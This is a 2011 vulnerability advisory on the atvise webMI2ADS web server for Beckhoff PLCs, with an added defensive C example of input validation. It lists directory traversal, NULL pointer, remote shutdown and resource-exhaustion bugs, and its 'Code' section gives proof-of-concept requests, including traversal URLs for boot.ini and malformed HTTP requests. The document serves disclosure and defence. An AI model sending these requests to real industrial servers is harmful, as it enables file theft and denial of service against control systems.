#######################################################################

                             Luigi Auriemma

Application:  atvise webMI2ADS - Web server for Beckhoff PLCs
              http://www.atvise.com/en/atvise-downloads/products
Versions:     <= 1.0
Platforms:    Windows XP embedded and CE x86/ARM
Bugs:         A] directory traversal
              B] NULL pointer
              C] termination of the software
              D] resources consumption
Exploitation: remote
Date:         10 Oct 2011
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bugs
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

From vendor's website:
"webMI2ADS is a very slim and compact web server with an ADS interface
(Beckhoff native PLC interface). It can be integrated on nearly any
ethernet based Beckhoff PLC and provides full data access including
automatic import of all PLC variables and types."

#######################################################################

=======
2) Bugs
=======

----------------------
A] directory traversal
----------------------

Classical directory traversal through the backslash delimiter, which
allows retrieving files located on the disk where the server is
running.

---------------
B] NULL pointer
---------------

NULL pointer dereference caused by the lack of a check on the value
returned by strchr on the Authorization Basic HTTP field:

  0043094F  |> 6A 06          PUSH 6                                   ; /maxlen = 6
  00430951  |. 68 7CAB4400    PUSH webMI2AD.0044AB7C                   ; |s2 = "Basic "
  00430956  |. 8B45 08        MOV EAX,DWORD PTR SS:[EBP+8]             ; |
  00430959  |. 50             PUSH EAX                                 ; |s1
  0043095A  |. FF15 10044400  CALL DWORD PTR DS:[<&MSVCR90._strnicmp>] ; \_strnicmp
  ...skip...
  004309BC  |. 6A 3A          PUSH 3A                                  ; /c = 3A (':')
  004309BE  |. 8D8D F8FEFFFF  LEA ECX,DWORD PTR SS:[EBP-108]           ; |
  004309C4  |. 51             PUSH ECX                                 ; |s
  004309C5  |. FF15 FC034400  CALL DWORD PTR DS:[<&MSVCR90.strchr>]    ; \strchr
  004309CB  |. 83C4 08        ADD ESP,8
  004309CE  |. 8945 F4        MOV DWORD PTR SS:[EBP-C],EAX
  004309D1  |. 837D FC 00     CMP DWORD PTR SS:[EBP-4],0
  004309D5  |. 74 4B          JE SHORT webMI2AD.00430A22
  004309D7  |. 8B55 F4        MOV EDX,DWORD PTR SS:[EBP-C]
  004309DA  |. 2B55 FC        SUB EDX,DWORD PTR SS:[EBP-4]
  004309DD  |. 83FA 40        CMP EDX,40
  004309E0  |. 7D 40          JGE SHORT webMI2AD.00430A22
  004309E2  |. 8B45 F4        MOV EAX,DWORD PTR SS:[EBP-C]
  004309E5  |. C600 00        MOV BYTE PTR DS:[EAX],0

------------------------------
C] termination of the software
------------------------------

To terminate the software remotely it's enough to request the
/shutdown webpage.

------------------------
D] resources consumption
------------------------

Endless loop with memory consumption and CPU at 100% caused by a
particular negative Content-Length.

#######################################################################

===========
3) The Code
===========

http://aluigi.org/mytoolz/mydown.zip
http://aluigi.org/testz/udpsz.zip

A]
  mydown http://SERVER/..\..\..\..\..\..\..\boot.ini
  mydown http://SERVER/..%5c..%5c..%5c..%5c..%5c..%5cboot.ini

B]
  udpsz -c "GET / HTTP/1.0\r\nAuthorization: Basic blah\r\n\r\n" -T -D SERVER 80 -1

C]
  http://SERVER/shutdown

D]
  udpsz -c "POST / HTTP/1.0\r\nContent-Length: -30\r\n\r\n" -T -D SERVER 80 -1

#######################################################################

======
4) Fix
======

No fix.

#######################################################################
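Bugs A, B and D above are all missing input checks in the HTTP request parser: an unfiltered path separator, an unchecked strchr return, and an unsigned-only field accepted with a sign. The following C functions are an added example (not code from the advisory and not webMI2ADS code) showing the checks a defender would expect at each of those three points. All names are hypothetical; the Basic-auth helper is handed the already-decoded "user:pass" string so that the example needs no base64 routine, and Content-Length is assumed to arrive with surrounding whitespace already trimmed.

```c
#include <ctype.h>
#include <limits.h>
#include <stdio.h>
#include <string.h>

/* ---- A] path handling: refuse anything that could leave the web root ---- */

static int hex_val(int c) {
    if (c >= '0' && c <= '9') return c - '0';
    c = tolower((unsigned char)c);
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;
}

/* Decode %XX sequences. Returns 0 on success, -1 on malformed or NUL-encoding input. */
static int url_decode(const char *in, char *out, size_t outsz) {
    size_t o = 0;
    for (; *in; in++) {
        int c = (unsigned char)*in;
        if (c == '%') {
            int h = hex_val(in[1]);
            int l = (h >= 0) ? hex_val(in[2]) : -1;   /* stops at NUL, no over-read */
            if (l < 0) return -1;
            c = (h << 4) | l;
            in += 2;
        }
        if (c == 0 || o + 1 >= outsz) return -1;
        out[o++] = (char)c;
    }
    out[o] = '\0';
    return 0;
}

/* 1 if the request path is acceptable, 0 otherwise. Decodes first so that
   "%5c" (backslash) and "%2e%2e" are judged by what they become, not how they look. */
static int path_is_safe(const char *raw_path) {
    char dec[512];
    if (url_decode(raw_path, dec, sizeof dec) != 0) return 0;
    if (dec[0] != '/') return 0;
    if (strchr(dec, '\\') != NULL) return 0;   /* backslash is a separator on Windows */
    const char *p = dec;
    while (*p) {                                /* reject any "." or ".." segment */
        while (*p == '/') p++;
        const char *seg = p;
        while (*p && *p != '/') p++;
        size_t n = (size_t)(p - seg);
        if ((n == 1 && seg[0] == '.') || (n == 2 && seg[0] == '.' && seg[1] == '.'))
            return 0;
    }
    return 1;
}

/* ---- B] Authorization: Basic, with the strchr result actually checked ---- */

/* Case-insensitive "Basic " prefix test; stops early at NUL. */
static int has_basic_prefix(const char *v) {
    static const char prefix[] = "basic ";
    for (size_t i = 0; i < 6; i++)
        if (tolower((unsigned char)v[i]) != prefix[i]) return 0;
    return 1;
}

/* Split decoded "user:pass". Returns 0 on success, -1 on no colon or oversize part.
   The NULL test on strchr is the check the disassembly above lacks. */
static int split_basic_credentials(const char *decoded, char *user, size_t usersz,
                                   char *pass, size_t passsz) {
    const char *colon = strchr(decoded, ':');
    if (colon == NULL) return -1;                  /* "blah" -> no write through NULL */
    size_t ulen = (size_t)(colon - decoded);
    size_t plen = strlen(colon + 1);
    if (ulen >= usersz || plen >= passsz) return -1;
    memcpy(user, decoded, ulen); user[ulen] = '\0';
    memcpy(pass, colon + 1, plen); pass[plen] = '\0';
    return 0;
}

/* ---- D] Content-Length: digits only, bounded, no sign ---- */

/* Returns the length, or -1 for empty, signed, non-numeric, overflowing or > max_body. */
static long parse_content_length(const char *v, long max_body) {
    if (*v == '\0') return -1;
    long n = 0;
    for (; *v; v++) {
        if (!isdigit((unsigned char)*v)) return -1;    /* rejects "-30", "+5", "1e3" */
        int d = *v - '0';
        if (n > (LONG_MAX - d) / 10) return -1;        /* would overflow long */
        n = n * 10 + d;
        if (n > max_body) return -1;                   /* bound the body we will buffer */
    }
    return n;
}

int main(void) {
    char u[64], p[64];
    printf("path  /..%%5c..%%5cboot.ini -> %d\n", path_is_safe("/..%5c..%5cboot.ini"));
    printf("auth  \"blah\"              -> %d\n", split_basic_credentials("blah", u, sizeof u, p, sizeof p));
    printf("clen  \"-30\"               -> %ld\n", parse_content_length("-30", 1048576));
    return 0;
}
```

Each function fails closed: a request that does not pass is answered with an error before any file access, credential write or body read happens, which is the property the advisory's four test cases probe.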